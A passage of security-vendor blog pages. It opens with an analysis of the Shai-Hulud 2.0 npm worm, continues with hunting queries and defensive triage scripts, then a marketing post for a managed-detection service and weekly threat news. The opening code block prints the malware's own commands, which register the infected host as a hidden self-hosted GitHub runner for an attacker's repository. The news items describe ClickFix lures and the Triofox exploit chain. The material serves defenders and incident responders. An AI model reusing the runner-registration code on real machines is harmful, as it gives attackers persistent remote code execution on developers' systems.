        await Bun.$`RUNNER_ALLOW_RUNASROOT=1 ./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();
        await Bun.$`rm actions-runner-linux-x64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");
        Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();
      } else {
        if (a0_0x5a88b3.platform() === "win32") {
          await Bun.$`powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-win-x64-2.330.0.zip -OutFile actions-runner-win-x64-2.330.0.zip"`.cwd(a0_0x5a88b3.homedir());
          await Bun.$`powershell -ExecutionPolicy Bypass -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"actions-runner-win-x64-2.330.0.zip\", \".\")"`.cwd(a0_0x5a88b3.homedir());
          await Bun.$`./config.cmd --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir()).quiet();
          Bun.spawn(["powershell", '-ExecutionPolicy', "Bypass", "-Command", "Start-Process -WindowStyle Hidden -FilePath \"./run.cmd\""], {
            'cwd': a0_0x5a88b3.homedir()
          }).unref();
        } else {
          if (a0_0x5a88b3.platform() === "darwin") {
            await Bun.$`mkdir -p $HOME/.dev-env/`;
            await Bun.$`curl -o actions-runner-osx-arm64-2.330.0.tar.gz -L https://github.com/actions/runner/releases/download/v2.330.0/actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();
            await Bun.$`tar xzf ./actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + "/.dev-env");
            await Bun.$`./config.sh --url https://github.com/${_0x349291}/${_0x2b1a39} --unattended --token ${_0x1489ec} --name "SHA1HULUD"`.cwd(a0_0x5a88b3.homedir + "/.dev-env").quiet();
            await Bun.$`rm actions-runner-osx-arm64-2.330.0.tar.gz`.cwd(a0_0x5a88b3.homedir + '/.dev-env');
            Bun.spawn(["bash", '-c', "cd $HOME/.dev-env && nohup ./run.sh &"]).unref();
          }
        }
      }

For persistence, the malware adds a workflow called “.github/workflows/discussion.yaml” that contains an injection vulnerability, allowing the threat actor to write a specially crafted message in the repository discussions section. Subsequently, the message executes code on the infected host registered as a runner.

Fig. 2: Discussion section in GitHub

Impact & Objectives

Unlike previous attacks that only targeted the software development environment, this attack also steals AWS, GCP, and Azure secrets that could allow the threat actor to move laterally across the cloud environment. Such information is saved to the “cloud.json” file:

Fig. 3: Base64-encoded JSON with empty cloud information

The base64 in Fig. 3 translates to the following:

{"aws":{"secrets":[]},"gcp":{"secrets":[]},"azure":{"secrets":[]}}

The creation of the file does not necessarily mean that the cloud secrets have been stolen as the config can be empty.
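
Because an empty cloud.json is possible, responders need to decode a recovered file to see which providers' secrets it actually holds. The following is an added example, not code from the report: it peels the base64 layer shown in Fig. 3 and counts secrets per provider without printing them. The tolerance for up to three nested base64 layers and the function names are assumptions, and the sample inputs are constructed.

```javascript
// Added example: check whether a recovered cloud.json actually holds cloud secrets.
// Secret values are never printed; only per-provider counts are reported.
const PROVIDERS = ['aws', 'gcp', 'azure'];      // top-level keys in the decoded Fig. 3 JSON
const BASE64_RE = /^[A-Za-z0-9+/]+={0,2}$/;
const MAX_LAYERS = 3;                           // assumption: tolerate nested base64 encoding

// Peel base64 layers until the text parses as a JSON object; null if it never does.
function decodeCloudJson(raw) {
  let text = String(raw).trim();
  for (let layer = 0; layer <= MAX_LAYERS; layer++) {
    try {
      const doc = JSON.parse(text);
      if (doc && typeof doc === 'object' && !Array.isArray(doc)) return { doc, layers: layer };
    } catch { /* not JSON at this layer, try base64 */ }
    const compact = text.replace(/\s+/g, '');
    if (compact.length === 0 || compact.length % 4 !== 0 || !BASE64_RE.test(compact)) return null;
    text = Buffer.from(compact, 'base64').toString('utf8').trim();
  }
  return null;
}

// Summarise a cloud.json body: which providers have a non-empty "secrets" array.
function triageCloudJson(raw) {
  const decoded = decodeCloudJson(raw);
  if (!decoded) return { parsed: false, layers: 0, counts: {}, exposed: [], unknownKeys: [] };
  const counts = {};
  for (const provider of PROVIDERS) {
    const secrets = decoded.doc[provider] && decoded.doc[provider].secrets;
    counts[provider] = Array.isArray(secrets) ? secrets.length : 0;
  }
  return {
    parsed: true,
    layers: decoded.layers,
    counts,
    exposed: PROVIDERS.filter((provider) => counts[provider] > 0),
    unknownKeys: Object.keys(decoded.doc).filter((key) => !PROVIDERS.includes(key)),
  };
}

// Constructed samples: the empty structure from the report, and a doubly encoded
// variant carrying one placeholder entry (not a real credential).
const EMPTY_JSON = '{"aws":{"secrets":[]},"gcp":{"secrets":[]},"azure":{"secrets":[]}}';
const EMPTY_SAMPLE = Buffer.from(EMPTY_JSON).toString('base64');
const POPULATED_JSON = JSON.stringify({
  aws: { secrets: [{ note: 'constructed placeholder' }] },
  gcp: { secrets: [] },
  azure: { secrets: [] },
});
const POPULATED_SAMPLE = Buffer.from(Buffer.from(POPULATED_JSON).toString('base64')).toString('base64');

function demo() {
  return [EMPTY_SAMPLE, POPULATED_SAMPLE, 'not base64 !!'].map(triageCloudJson);
}
console.log(JSON.stringify(demo(), null, 2));
```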

The threat actor is also using TruffleHog in this new attack to steal secrets related to the development environment, such as GitHub and NPM secrets and tokens, a tactic also seen in the previous “Shai-Hulud” attack.

While the exact motives of the attackers are currently unknown, successful infection is resulting not only in the theft of intellectual property and private code, but also cloud secrets that could allow a broader breach across a cloud environment. The persistence capabilities allow the threat actor to execute malicious code on the infected host, which is an asset within the development environment of the victim.

SentinelOne Detection Capabilities

Endpoint Protection (EPP)

SentinelOne EPP behavioral AI engines continuously monitor for suspicious activities associated with supply chain attacks and worm propagation, including:

  • Execution of malicious scripts and packages
  • Unauthorized file modifications in CI/CD workflows
  • Privilege escalation and credential abuse
  • Suspicious runtime installations and network-based script execution

Platform Detection Rules

The SentinelOne Platform Detection Library includes rules to detect Shai-Hulud worm activity across multiple attack stages:

  • Potential Malicious NPM Package Execution – Detects execution of known malicious npm packages used by Shai-Hulud
  • Shai-Hulud Worm Workflow File Write Activity – Identifies unauthorized modifications to GitHub Actions workflows and malicious payload deployment
  • Shai-Hulud Bun Runtime Installation via Network Fetch – Catches suspicious Bun runtime installations via remote script execution
  • Shai-Hulud Unattended GitHub Runner Registration – Detects automated registration of self-hosted GitHub runners with malicious characteristics

Threat Hunting

The Wayfinder Threat Hunting team is proactively hunting, leveraging threat intelligence associated with this emerging threat. If any suspicious activity is identified in your environment, we will notify your organization’s designated escalation contacts immediately.

Recommendations

Wayfinder Threat Hunting provides the following recommendations for immediate action and strategic mitigation:

  1. Enable the relevant Platform Detection Rules from the section above.
  2. Enable Agent Live Security Update for real-time updates.
  3. Remove and replace compromised packages.
  4. Pin package versions where possible.
  5. Disable npm postinstall scripts in CI where possible.
  6. Revoke and regenerate npm tokens, GitHub secrets, SSH keys, and cloud provider credentials.
  7. Enforce hardware-based MFA for developer and CI/CD accounts.

Tactical Tools for HuntOps

IOCs (Indicators of Compromise)

Hunting Queries

Query 1: SHA1HULUD Runner Execution

dataSource.name = 'SentinelOne' and event.type = 'Process Creation' and src.process.cmdline contains '--name SHA1HULUD' and src.process.cmdline contains '--unattended --token '

Query 2: SHA1HULUD Malicious JS

dataSource.name = 'SentinelOne' AND tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc") and src.process.name contains 'node'

Query 3: Suspicious “bun_environment.js” Files Potentially Linked to SHA1HULUD

dataSource.name = 'SentinelOne' AND tgt.file.size>7000000 AND (tgt.file.path contains '/bun_environment.js' or tgt.file.path contains '\\bun_environment.js') AND !(tgt.file.sha1 in ("3d7570d14d34b0ba137d502f042b27b0f37a59fa","d60ec97eea19fffb4809bc35b91033b52490ca11","8de87cf4fbdd1b490991a1ceb9c1198013d268c2","f37c6179739cf47e60280dd78cb1a86fd86a2dcf","91429fbfef99fa52b6386d666e859707a07844b2","ba08d2fcc6cd1c16e4022c5b7af092a4034ceedc"))

Managed Defense Reimagined: Introducing Wayfinder Threat Detection and Response

This is an era defined by relentless pressure on cybersecurity professionals. As environments and attack surfaces have expanded, endpoint, cloud, identity, and now AI signals continue to pile up faster than teams can interpret them. Meanwhile, rapidly evolving TTPs, fueled by ransomware-as-a-service (RaaS) and other off-the-shelf tooling, have enabled motivated threat actors to move with the sophistication and speed of the most advanced nation-state adversaries.

With defenders stretched thin, actors are using these advanced techniques to hide behind operational noise. Handling alert fatigue alone isn’t enough: even mature teams can struggle to confront advanced persistent threats, especially those that specialize in evasion and long-term access.

Addressing these new realities requires reimagining defenses – new strategies to unify signals, eliminate the noise, augment human capacity, and truly prepare for incidents long before they happen. This requires more than just better tools. It requires a full shift in how detection and response is delivered.

That shift is SentinelOne’s Wayfinder Threat Detection and Response (Wayfinder TDR), now generally available (GA).

Our Ethos | Defense Through AI, Intelligence & Human Experts

Wayfinder TDR is built on a foundational belief: True cyber resilience emerges from the fusion of AI, intelligence, and world-class human expertise – not from any single component in isolation.

Modern adversaries evolve too quickly, hide too effectively, and move too fluidly for traditional service models to keep up. Automated systems can miss subtle behaviors and human teams alone cannot keep pace with the scale of telemetry, meaning generic threat feeds are no longer the right solution. True defense requires three pillars working in concert.

Intelligence provides the early warning – timely, curated, contextual insight into an attacker’s behavior and tactics. SentinelOne integrates Google Threat Intelligence (GTI), one of the most powerful and comprehensive intelligence sources in the world, directly into every part of Wayfinder. It delivers a level of global threat visibility previously available only to a small set of elite organizations. This data is combined with our SentinelOne intelligence for an unparalleled set of threat content previously unseen in cybersecurity.

AI then transforms that intelligence and raw telemetry into actionable outcomes. SentinelOne’s industry-leading Purple AI engine automates triage, accelerates investigation, enriches findings with context, and closes the gap between detection and action. AI allows Wayfinder experts to cut through overwhelming volumes of data and surface what actually matters to the operation.

Finally, human expertise applies the experience and ingenuity to understand and act on what’s uncovered. Across 16 countries, SentinelOne’s team of threat hunters, analysts, incident responders, and strategic advisors bring decades of hands-on experience with the world’s most sophisticated adversaries. This combined knowledge closes gaps that machines alone cannot see, validating ambiguous signals and guiding customers through moments of uncertainty with clarity and confidence.

Wayfinder deepens this philosophy by combining elite human expertise with agentic, AI-powered threat hunting and investigations. This multi-layered human and AI model brings a level of defense that neither humans nor machines can achieve alone. We believe that the future of AI security is one that elevates – rather than replaces – human defenders, arming them with the speed of automation and the insights of global intelligence.

Our Portfolio | Tailored Protection & Elite Expertise

Wayfinder Threat Detection & Response is a unified portfolio designed to meet organizations where they are. From automated hunting and 24/7/365 MDR to high-touch advisory services during crises, each Wayfinder offering can either stand alone, or bring a comprehensive and adaptive defense program together.

These services deliver end-to-end coverage across preparation, detection, investigation, response, and recovery, ensuring customers are supported through every phase of the threat lifecycle.

Wayfinder Threat Hunting

Threat hunting is the foundation of the portfolio, delivering always-on, fully automated hunts powered by GTI and SentinelOne’s threat intelligence, and enriched by SentinelOne experts. It continuously scans customer environments for emerging attacker infrastructure, high-confidence indicators of compromise, and evolving techniques.

Wayfinder Threat Hunting is unique in that it requires no manual tuning, no scheduled queries, and no analyst scripting. Intelligence updates stream directly into the system and are matched against customer telemetry with contextual attribution – threat actor, campaign, and MITRE mapping all included. Findings immediately feed into MDR workflows for rapid investigation and response.

This eliminates blind spots that attackers rely on and brings dynamic, intelligence-led coverage to every organization, regardless of staffing or maturity level.

Wayfinder MDR Essentials

MDR Essentials delivers enterprise-grade, always-on XDR coverage across endpoints, cloud environments, identity providers, and supported partner services. It provides continuous monitoring, triage, investigation, and response, powered by SentinelOne analysts, AI-driven inference, and threat hunting insights. Using curated intelligence from both SentinelOne’s AI-driven alerting and triage and Google Threat Intelligence, get rapid insight and protection at scale.

MDR Essentials is built for organizations that want strong, immediate defense without operational complexity. Onboarding and activation are simple and swift while coverage is unified through the Singularity Platform. Customers benefit from 24/7 protection, rapid containment, and detailed guidance without needing to expand internal teams.

With MDR Essentials, organizations finally get the confidence that cyber experts are watching every signal, every hour, across every critical surface.

Wayfinder MDR Elite

Wayfinder MDR Elite extends the Essentials experience with a premium, high-touch operating model for organizations that are looking for deeper partnership, strategic alignment, and more proactive readiness and response. Every MDR Elite customer receives a dedicated Threat Advisor, an expert who becomes embedded in their security program, and offers hands-on guidance, operational reviews, and tailored risk management recommendations.

Elite also provides bundled access to SentinelOne’s DFIR specialists, enabling advanced investigations, malware analysis, and targeted forensics. Elite customers also receive a built-in Incident Readiness & Response (IRR) retainer, ensuring they have pre-approved hours available for compromise assessments, breach simulations, preparedness workshops, and expert counsel during major incidents.

For teams that want not just coverage but clarity, Elite becomes a trusted extension of their leadership and decision-making process.

Wayfinder Incident Readiness & Response

Wayfinder IRR creates a foundation of preparedness that many organizations simply do not have today. With a renewable pool of hours, customers can proactively strengthen their posture or engage experts during high-pressure moments.

The key to this offering is flexibility. Use those hours to get immediate, 24/7/365 access to elite DFIR specialists that respond effectively and compliantly to critical incidents. Or use hours for breach readiness exercises and compromise assessments to uncover hidden risks and improve your security posture and readiness.

Wayfinder IRR experts act as a trusted partner who can guide organizations through high-pressure moments before, during, and after a breach to build confidence, clarity, and resilience. Expert-led exercises, simulations, and advisory services will transform theoretical security plans into reliable, tested incident response capabilities. And when incidents do occur, our team will not only contain, investigate, and stop the breach in its tracks, but will reconstruct attacker activity to understand the “how” and “what” of an incident, identifying compromised accounts, exfiltrated data, and affected systems.

Wayfinder Emergency Response

For organizations experiencing an active breach without a retainer in place, Wayfinder Emergency Response provides urgent access to a 40-hour block of DFIR expertise. It enables rapid containment, adversary eviction, hands-on investigation, and guidance during critical situations.

Our experts’ deep platform expertise speeds investigations and delivers critical evaluations such as rapid Root Cause Analysis, malware reverse engineering, IOC analysis, and more. With Wayfinder Emergency Response, achieve complete incident control with rapid threat containment, root cause analysis, and privileged, counsel-driven investigative support with defensible reporting. This ensures that all organizations have an expert-led lifeline supported by AI-driven analysis and Google-enhanced intelligence during the most critical moments.

Our Vision | Redefining Managed Services for the AI Era

For years, organizations have been forced to choose between generic intelligence feeds, siloed MDR services, and incomplete incident response retainers. These make for complex in-house responsibilities since point solutions only offer bolt-ons rather than cohesive strategies. AI was underutilized. Human expertise was expensive, inconsistent, or inaccessible. We set out to eliminate the fragmentation that leaves so many organizations exposed.

SentinelOne’s Wayfinder TDR services break that cycle by unifying agentic AI, elite human operators, and unmatched threat intelligence insights into a single, adaptive defense fabric. The result? A portfolio that not only responds to threats but proactively seeks them out, contextualizes them, and then empowers organizations to act with precision and speed.

It stands alone in merging together the deep integration of GTI, operational automation driven by AI, and the global scale of human expertise. Instead of stitching together disparate solutions, Wayfinder is purpose-built to streamline telemetry, intelligence, and human insight into a coherent defense program.

This shift matters as modern adversaries are no longer linear nor predictable – they’re fluid. They adapt rapidly. And, they exploit operational complexity. To reduce that complexity, Wayfinder closes detection gaps and reduces the noise while ensuring that experts are available before, during, and after any incident.

This is a fundamental redefinition of what managed security can achieve when human ingenuity and agentic AI move in sync. Aligning intelligence, technology, and human judgment in a single adaptive defense, Wayfinder raises the bar for what true managed security must deliver.

Conclusion | Proactive & Scalable Defense Starts Now

The future of cybersecurity belongs to organizations that can see farther ahead, move faster, and act with confidence. Attackers are only becoming more automated and opportunistic, meaning SOCs need more than tools – they need a combination of the right intelligence translated by trusted experts and partnership when incidents arise.

As announced at OneCon 2025, Wayfinder joins human expertise, agentic AI, and Google Threat Intelligence to deliver a multi-layered human + AI defense model that helps customers fill in their skill gaps, elevate teams, and strengthen their posture immediately.

Wayfinder TDR is the next evolution of SentinelOne’s services portfolio, combining threat hunting, managed detection, and incident response into a force multiplier to empower organizations in regaining control and reducing daily risk.

Shift the advantage back to the defending side with Wayfinder – watch an overview here and book a demo to get started.

The Good, the Bad and the Ugly in Cybersecurity – Week 47

The Good | Courts Prosecute DPRK Fraud, Ransomware Hosting & Crypto Mixer Ops

Five people have pleaded guilty to helping the DPRK run illicit revenue schemes involving remote IT worker fraud and cryptocurrency theft. The group enabled North Korean operatives to obtain U.S. jobs using false or stolen identities, generating over $2.2 million while impacting 136 companies. The DOJ is also seeking forfeiture of $15 million tied to APT38 cyber-heists. The defendants, Oleksandr Didenko, Erick Prince, Audricus Phagnasay, Jason Salazar, and Alexander Travis, admitted to stealing U.S. identities for overseas workers and laundering stolen funds.

In the U.S., U.K., and Australia, authorities have issued a coordinated sanction against Russian bulletproof hosting (BPH) providers that enable ransomware groups by leasing servers to support malware delivery, phishing attacks, and illicit content hosting. To help cybercriminals evade capture, BPH services ignore abuse reports and law enforcement takedowns. OFAC has sanctioned Media Land, its sister companies, and three executives all tied to LockBit, BlackSuit, Play, and other threat groups. Five Eyes agencies also released guidance to help ISPs detect and block malicious infrastructure used by BPH services.

Our 🆕 joint guidance on bulletproof hosting providers highlights best practices to mitigate potential cybercriminal activity, including recommended actions that ISPs can implement to decrease the usefulness of BPH infrastructure. Learn more 👉 https://t.co/cGQpuLpBPP pic.twitter.com/tM55acfuQv

— CISA Cyber (@CISACyber) November 19, 2025

The founders of Samourai Wallet, a cryptocurrency mixing service, have been sentenced to prison for laundering over $237 million. Operating since 2015, Samourai used its ‘Whirlpool’ mixing system and ‘Ricochet’ multi-hop transactions to obscure Bitcoin flows. These features made tracing more difficult and enabled criminals involved in darknet markets, drug trafficking, and cybercrime to launder more than $2 billion. Authorities seized the platform, including its servers, domains, and mobile app, while the founders agreed to forfeit all traceable proceeds. CEO Keonne Rodriguez has received five years, while CTO William Lonergan Hill received four along with supervised release. The pair were ordered to pay fines of $250,000 each.

The Bad | DPRK Actors Build Fake Job Platform to Lure AI Talent & Push Malware

As part of their ongoing and evolving Contagious Interview campaign, DPRK-based threat actors have created a fake job platform designed to compromise legitimate job seekers, particularly in the AI research, software development, and cryptocurrency verticals. While earlier fraudulent IT-worker schemes relied on targeting individuals through phishing on social media platforms, the latest tactic weaponizes a fully functional hiring pipeline.

Researchers discovered the latest lure – a Next.js-based job portal hosted at lenvny[.]com, complete with dozens of fabricated AI and crypto-industry job listings. The listings mimic branding from major tech companies and feature a polished UI and full recruitment workflow that mirrors modern hiring systems, encouraging applicants to submit resumes and professional links before prompting them to record a video introduction.

This final step triggers the DPRK-favored ClickFix technique: When applicants copy the fake interview instructions, a hidden clipboard hijacker swaps their text with a multi-stage malware command. When pasted into a terminal, it downloads and executes staged payloads under the guise of a “driver update”, ultimately launching a VBScript-based loader. This design blends seamlessly with typical remote-work interview processes and dramatically increases the likelihood of accidental execution.

Error message with ClickFix message (Source: Validin)

The platform also performs strategic filtering, attracting AI and crypto professionals specifically because their skills, network access, and workstation devices tend to align with DPRK’s intelligence and financial priorities, from model-training infrastructure to crypto exchange systems. The campaign reflects significant maturation in DPRK social engineering tradecraft, pairing high-fidelity UI design with covert malware delivery. Job seekers are advised to verify domains, avoid off-platform hiring systems, and execute any requested code only in sandboxed environments.

The Ugly | Iran-Backed Actors Weaponize Cyber Recon to Power Real-World Attacks

Iranian-linked threat actors are using cyber operations to support real-world military activity, a pattern described by researchers as “cyber-enabled kinetic targeting”.

In the past, conventional security models separated cyber and physical domains – delineations that are proving artificial in today’s socioeconomic and political climate. These are no longer just cyber incidents that cause physical impact, but coordinated campaigns in which digital operations are built to advance military objectives.

One example involves Crimson Sandstorm (aka Tortoiseshell and TA456), a group tied to Iran’s Islamic Revolutionary Guard Corps (IRGC). Between December 2021 and January 2024, the group probed a ship’s Automatic Identification System (AIS) before expanding their operations to other maritime platforms. On January 27, 2024, the group searched for AIS location data on one particular shipping vessel. Days later, that same ship was targeted in an unsuccessful missile strike by Iranian-backed Houthi forces, which have mounted repeated missile attacks on commercial shipping in the Red Sea amid the Israel–Hamas conflict.

A second case highlights Mango Sandstorm (aka Seedworm and TA450), a group affiliated with Iran’s Ministry of Intelligence and Security (MOIS). In May, the group set up infrastructure for cyber operations and gained access to compromised CCTV feeds in Jerusalem to gather real-time visual intelligence. Just a month later, the Israel National Cyber Directorate confirmed Iranian attempts to access cameras during large-scale attacks, reportedly to get feedback on where the missiles hit and improve precision. Both highlighted cases show the attackers’ reliance on routing traffic through anonymizing VPNs to prevent attribution.

The divide between digital intrusions and physical warfare continues to blur. With nation state groups leveraging cyber reconnaissance as a precursor for physical attacks, it is likely we will continue to see significant developments in this kind of hybrid warfare.

The Good, the Bad and the Ugly in Cybersecurity – Week 46

The Good | FBI and Europol Arrest Ransomware Broker and Dismantle Major Botnet

Russian national Aleksey Olegovich Volkov is set to plead guilty to acting as an initial access broker (IAB) for Yanluowang ransomware attacks targeting at least eight U.S. companies from July 2021 to November 2022.

Using aliases like “chubaka.kor” and “nets”, Volkov sold access to the ransomware group after breaching his victims’ corporate networks and demanding ransoms from $300,000 to $15 million in Bitcoin. FBI investigators traced Volkov through iCloud, cryptocurrency records, and social media, recovering chat logs, stolen credentials, and evidence of ransom negotiations, all of which linked him to $1.5 million in collected payments.

His breaches affected companies across multiple states, including banks, engineering firms, and telecoms. Volkov faces up to 53 years in prison and over $9.1 million in restitution for charges including trafficking in access, identity theft, computer fraud, and money laundering.

Law enforcement agencies across several countries dismantled over 1000 servers linked to the Rhadamanthys infostealer, VenomRAT, and Elysium botnet as part of Operation Endgame, an international effort against cybercrime. Coordinated by Europol and Eurojust with support from private partners, the action consisted of searches at 11 locations in Germany, Greece, and the Netherlands, where officers seized 20 domains and arrested a key VenomRAT suspect.

The disrupted infrastructure involved hundreds of thousands of infected devices and millions of stolen credentials, including access to over 100,000 crypto wallets. Rhadamanthys, active since 2023, had seen rapid growth in late 2025, affecting thousands of IP addresses daily.

Authorities recommend checking systems for infection via politie.nl/checkyourhack and haveibeenpwned.com. Operation Endgame has previously disrupted numerous malware and ransomware networks, including Bumblebee, IcedID, Pikabot, Smokeloader, SystemBC, and Trickbot, highlighting ongoing international efforts to curb cybercrime.

The Bad | UNC6485 Exploits Triofox Vulnerability for Remote Code Execution

Threat actors have exploited a critical vulnerability in Gladinet’s Triofox file sharing and remote access platform, chaining it with the product’s built-in antivirus scanner to gain SYSTEM-level remote code execution (RCE).

The vulnerability, tracked as CVE-2025-12480, allows attackers to abuse an access control logic error that grants admin privileges when the request host equals ‘localhost’. By spoofing this value in the HTTP Host header, an attacker can reach sensitive setup pages without credentials, especially on systems where the TrustedHostIp parameter was never configured.

Security researchers first discovered an intrusion in August targeting a Triofox instance running version 16.4.10317.56372. They later determined that the threat cluster UNC6485 used a malicious HTTP GET request containing a localhost header to access the AdminDatabase.aspx setup page.

Using this workflow, the attackers created a rogue administrator account called ‘Cluster Admin’, uploaded a malicious script, and configured Triofox to treat that script as the antivirus scanner path. Since the scanner inherits SYSTEM-level privileges from the parent process, this allowed the attackers to execute arbitrary code.

Source: Google Threat Intelligence Group

The payload then launches a PowerShell downloader to retrieve a Zoho UEMS installer, which subsequently deploys Zoho Assist and AnyDesk on the compromised host for remote access and lateral movement. The attackers were also observed using Plink and PuTTY to establish SSH tunnels and forward traffic to the compromised host’s RDP port.

Gladinet has since fixed CVE-2025-12480 in Triofox version 16.7.10368.56560, and administrators are urged to update to the latest release (16.10.10408.56683), review admin accounts, and ensure the antivirus engine is not configured to run unauthorized binaries.
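For teams reviewing exposure, the access pattern described above (a Host header of ‘localhost’ arriving from a non-loopback client) can be hunted in web server logs. The following is an added example, not code from Gladinet or the researchers; it assumes IIS W3C extended logging with the optional cs-host field enabled, and the log lines and URL paths are constructed samples.

```python
import ipaddress

# Constructed sample in IIS W3C extended log format (not from a real incident).
# Client addresses use documentation ranges; the URL paths are placeholders.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem c-ip cs-host sc-status
2025-01-01 10:00:01 GET /AdminDatabase.aspx 203.0.113.7 localhost 200
2025-01-01 10:00:05 GET /AdminDatabase.aspx ::1 localhost 200
2025-01-01 10:00:09 GET /portal/login.aspx 198.51.100.20 files.example.com 200
2025-01-01 10:00:12 POST /portal/upload.aspx 203.0.113.7 LOCALHOST:443 302
2025-01-01 10:00:15 GET /AdminDatabase.aspx 127.0.0.1 localhost 200
"""

SETUP_PAGE = "admindatabase.aspx"  # setup page named in the write-up


def parse_w3c(text):
    """Yield one dict per request, honouring the most recent #Fields directive."""
    fields = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))


def host_is_localhost(host):
    """True when the logged Host header names 'localhost', with or without a port."""
    name = host.lower().split(":", 1)[0].rstrip(".")
    return name == "localhost"


def client_is_loopback(addr):
    """True only when the TCP peer really is the local machine."""
    try:
        # IIS may append an IPv6 zone id such as %12; drop it before parsing.
        return ipaddress.ip_address(addr.split("%", 1)[0]).is_loopback
    except ValueError:
        return False  # unparsable peer address: treat as remote so it is surfaced


def find_spoofed_localhost(text):
    """Return requests that claim Host: localhost but came from a remote peer."""
    findings = []
    for rec in parse_w3c(text):
        host, peer = rec.get("cs-host", "-"), rec.get("c-ip", "-")
        if host_is_localhost(host) and not client_is_loopback(peer):
            stem = rec.get("cs-uri-stem", "-")
            findings.append({
                "when": f"{rec.get('date', '?')} {rec.get('time', '?')}",
                "c-ip": peer,
                "cs-host": host,
                "uri": stem,
                # Requests for the setup page deserve the first look.
                "setup_page": stem.lower().endswith(SETUP_PAGE),
            })
    return findings


if __name__ == "__main__":
    for hit in find_spoofed_localhost(SAMPLE_LOG):
        print(hit)
```

If the server sits behind a reverse proxy or load balancer, c-ip holds the proxy's address, so the check needs the forwarded client address instead.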

The Ugly | Attackers Exploit Zero-Day to Steal Washington Post Employee Data

The Washington Post, one of the vendors impacted by a breach targeting Oracle software, is notifying nearly 10,000 current and former employees and contractors that their personal and financial information has been exposed in the data theft campaign.

The Post, one of the largest U.S. newspapers with 2.5 million digital subscribers, confirmed that attackers accessed parts of its network between July 10 and August 22 by exploiting a previously unknown zero-day vulnerability in Oracle E-Business Suite, the organization’s internal enterprise resource planning (ERP) system. The vulnerability is tracked as CVE-2025-61884.

According to the letter sent to affected individuals, the Post learned of the intrusion after a threat actor contacted the company on September 29 claiming access to its Oracle applications. Post-breach investigations identified the widespread flaw that allowed the attackers to access many Oracle customers’ applications. The attackers used this flaw to steal sensitive data and later attempted to extort the Post and other organizations breached in the same campaign.

Although the Post did not name the group responsible, the Cl0p ransomware operation is suspected to be behind the attacks. Other high-profile victims of the same Oracle zero-day include Harvard University, Envoy Air, and GlobalLogic, with additional impacted organizations listed on Cl0p’s leak site.

The Post’s investigation has determined that data belonging to 9,720 individuals was compromised. Exposed information includes full names, Social Security numbers, tax and ID numbers, and bank account and routing numbers. Impacted individuals have been offered 12 months of free identity protection through IDX and advised to place credit freezes on their accounts and fraud alerts for additional protection.

The Good, the Bad and the Ugly in Cybersecurity – Week 45

The Good | Authorities Crack Down on Ransomware, Crypto Fraud & DPRK Laundering Ops

Three ex-employees of cybersecurity firms DigitalMint and Sygnia have been indicted for participating in BlackCat (aka ALPHV) ransomware attacks on five U.S. companies between May and November 2023.

The defendants allegedly acted as BlackCat affiliates, breaching networks, stealing data, deploying encryption malware, and demanding cryptocurrency ransoms. Victims included medical, pharmaceutical, and engineering firms. Prosecutors say the ransom demands ranged from $300,000 to $10 million, with one company paying out $1.27 million. The trio faces up to 50 years each in prison if convicted.

Also this week, the U.S. Treasury sanctioned two North Korean financial institutions and eight individuals for laundering cryptocurrency stolen via fraudulent IT worker schemes. Those designated include Ryujong Credit Bank and Korea Mangyongdae Computer Technology Company (KMCTC), along with executives and bankers responsible for managing funds linked to ransomware attacks and UN sanctions violations.

OFAC says that over the last 3 years DPRK-affiliated cybercriminals have stolen more than $3 billion in cryptocurrency using malware and social engineering. The sanctions freeze U.S. assets and warn that transactions with these entities risk secondary penalties.

In Europe, authorities have arrested nine suspects involved in a cryptocurrency fraud network responsible for stealing over €600 million ($689 million) across multiple countries. The criminals allegedly created fake crypto investment platforms that promised high returns and recruited victims through social media, cold calls, and fake endorsements from celebrity investors. Victims lost their funds while the suspects laundered the stolen assets using blockchain tools. In operations coordinated by Eurojust in Cyprus, Spain, and Germany, law enforcement seized cash, crypto, and bank accounts.

The Bad | SleepyDuck Trojan Exploits Ethereum Smart Contracts to Evade Takedown

A new remote access trojan (RAT) dubbed ‘SleepyDuck’ has been masquerading as a well-used Solidity extension on the Open VSX open-source registry, researchers say. The malware uses Ethereum smart contracts to manage its command and control (C2) communications, helping it to maintain persistence even if its main server is taken down.

Initially benign when published on October 31, the infected extension, juan-bianco.solidity-vlang, became malicious after an update made the following day, by which time it had already been downloaded 14,000 times. For now, the extension remains available on Open VSX with a public warning. In total, it has been downloaded over 53,000 times.

Solidity VSCode warning (Source: Secure Annex)

Security researchers report that SleepyDuck activates when the code editor starts, a Solidity file opens, or when a compile command runs. It disguises its malicious activity through a fake webpack.init() function from extension.js, while secretly executing payloads that collect system information such as hostnames, usernames, MAC addresses, and timezones.

After it is triggered, the trojan queries the Ethereum blockchain to find the fastest RPC provider, read its C2 details, and enter a polling loop for new instructions. This blockchain-based C2 redundancy means that even if the main C2 domain (sleepyduck[.]xyz) is disabled, the malware can still fetch updated addresses or commands from the blockchain, making takedown efforts much more difficult.

